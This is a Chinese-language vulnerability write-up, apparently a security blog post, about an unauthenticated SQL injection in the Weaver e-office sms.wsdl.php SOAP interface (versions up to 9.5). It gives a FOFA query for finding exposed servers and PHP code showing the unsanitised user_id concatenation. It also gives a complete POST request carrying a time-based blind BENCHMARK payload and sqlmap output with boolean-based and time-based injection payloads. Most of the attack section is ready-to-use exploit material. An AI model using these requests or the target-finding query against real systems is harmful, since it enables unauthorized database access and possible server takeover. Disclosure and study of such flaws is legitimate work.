泛微e-office sms.wsdl.php sql注入漏洞


漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office sms.wsdl.php 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

影响版本

e-office <=9.5

fofa语句

app="泛微-EOffice"

漏洞分析

同样通过解析 wsdl 后有很多功能

这里只拿第一个来简单过一遍

webservice-json/sms/sms.wsdl.php 的 cancelNotifySmsRemind 业务逻辑如下

function cancelNotifySmsRemind( $notifyId, $UserInfor )
{
    $sms = authcheck( $UserInfor );
    if ( empty( $notifyId ) )
    {
        return 0;
    }
    $sms->cancelNotifySmsRemind( $notifyId );
    return 1;
}

$UserInfor 带入 authcheck 函数

function authCheck( $UserInfor )
{
    checkcurrentsession( );
    return new sms( $UserInfor );
}

public function __construct( $userInfo = array( ) )
    {
        global $connection;
        if ( $userInfo['user_id'] == "" )
        {
            $this->userid = $_SESSION['LOGIN_USER_ID'];
        }
        else
        {
            $this->userid = $userInfo['user_id'];
        }
        if ( $this->userid )
        {
            $sql = "SELECT DEPT_ID,USER_PRIV FROM user WHERE USER_ID='".$this->userid."'";
            $rs = exequery( $connection, $sql );
            $row = mysql_fetch_array( $rs );
            $this->deptid = $row['DEPT_ID'];
            $this->uesrpriv = $row['USER_PRIV'];
        }
        $this->curdate = date( "Y-m-d", time( ) );
        $this->curdatetime = date( "Y-m-d H:i:s", time( ) );
    }

$userInfo['user_id']被直接拼接进SQL语句后执行,无任何过滤校验,造成SQL注入漏洞,和之前的泛微e-office notify.wsdl.php sql注入漏洞 里一样。

漏洞复现

POST /webservice-json/sms/sms.wsdl.php HTTP/1.1
User-Agent: Apache-HttpClient/4.5.5 (Java/17.0.12)
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
SOAPAction: urn:SmsServicewsdl#cancelNotifySmsRemind
Content-Type: text/xml;charset=UTF-8
Host: eoffice.mrxn.net:8082

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SmsServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:cancelNotifySmsRemind soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <notifyId xsi:type="xsd:string">1</notifyId>
         <UserInfor xsi:type="urn:UserInfor">
            <!--type: string-->
            <user_id xsi:type="xsd:string">1' AND 1094=BENCHMARK(5000000,MD5(0x706d4744))-- qpIp</user_id>
            <!--type: string-->
            <user_name xsi:type="xsd:string">quae divum incedo</user_name>
            <!--type: string-->
            <session_id xsi:type="xsd:string">verrantque per auras</session_id>
         </UserInfor>
      </urn:cancelNotifySmsRemind>
   </soapenv:Body>
</soapenv:Envelope>

成功在延时 5 秒

sqlmap 结果如下

sqlmap identified the following injection point(s) with a total of 381 HTTP(s) requests:
---
Parameter: SOAP #2* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SmsServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:cancelNotifySmsRemind soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <notifyId xsi:type="xsd:string">1</notifyId>
         <UserInfor xsi:type="urn:UserInfor">
            <!--type: string-->
            <user_id xsi:type="xsd:string">1' RLIKE (SELECT (CASE WHEN (3536=3536) THEN 1 ELSE 0x28 END))-- kFbY</user_id>
            <!--type: string-->
            <user_name xsi:type="xsd:string">quae divum incedo</user_name>
            <!--type: string-->
            <session_id xsi:type="xsd:string">verrantque per auras</session_id>
         </UserInfor>
      </urn:cancelNotifySmsRemind>
   </soapenv:Body>
</soapenv:Envelope>

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SmsServicewsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:cancelNotifySmsRemind soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <notifyId xsi:type="xsd:string">1</notifyId>
         <UserInfor xsi:type="urn:UserInfor">
            <!--type: string-->
            <user_id xsi:type="xsd:string">1' AND 1094=BENCHMARK(5000000,MD5(0x706d4744))-- qpIp</user_id>
            <!--type: string-->
            <user_name xsi:type="xsd:string">quae divum incedo</user_name>
            <!--type: string-->
            <session_id xsi:type="xsd:string">verrantque per auras</session_id>
         </UserInfor>
      </urn:cancelNotifySmsRemind>
   </soapenv:Body>
</soapenv:Envelope>
---

手机扫码阅读

泛微e-office user.wsdl.php sql注入漏洞

万户ezOFFICE selectCommentField.jsp SQL注入漏洞

评 论